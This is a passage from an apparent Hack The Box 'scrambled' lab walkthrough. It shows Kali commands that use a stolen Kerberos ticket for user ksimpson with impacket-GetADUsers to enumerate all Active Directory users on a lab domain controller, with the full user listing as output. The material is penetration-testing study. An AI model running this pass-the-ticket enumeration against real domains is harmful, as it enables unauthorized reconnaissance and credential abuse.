Username Enumeration
Enumerating the entire domain users with the TGT of the ksimpson user using thepass_the_ticket technique
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=ksimpson@dc1.scrm.local.ccache impacket-GetADUsers scrm.local/@dc1.scrm.local -no-pass -k -all -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=ksimpson@dc1.scrm.local.ccache impacket-GetADUsers scrm.local/ksimpson@dc1.scrm.local -no-pass -k -all -dc-host dc1.scrm.local -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying dc1.scrm.local for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
administrator 2021-11-08 01:35:59.979923 2023-11-17 13:24:19.542958
Guest <never> <never>
krbtgt 2020-01-26 20:15:47.464029 <never>
tstar 2021-11-05 15:55:51.051205 2021-11-05 15:53:01.788267
asmith 2020-02-08 23:29:01.510215 <never>
sjenkins 2020-02-09 00:11:26.334926 <never>
sdonington 2020-02-09 00:11:54.413038 <never>
backupsvc 2021-10-31 21:49:04.491305 <never>
jhall 2021-10-31 22:09:23.755345 <never>
rsmith 2021-10-31 22:09:54.865219 <never>
ehooker 2021-11-03 20:02:41.722494 2021-11-03 20:03:02.522126
khicks 2021-11-01 16:36:08.897478 <never>
sqlsvc 2021-11-03 17:32:02.351452 2023-11-17 13:24:52.945072
miscsvc 2021-11-03 19:07:47.993436 2022-05-30 14:37:41.376125
ksimpson 2021-11-04 01:30:57.166952 2023-11-17 18:06:58.073253 The -dc-host flag is mandatory given the target domain has the NTLM authentication disabled
These users will be saved into a file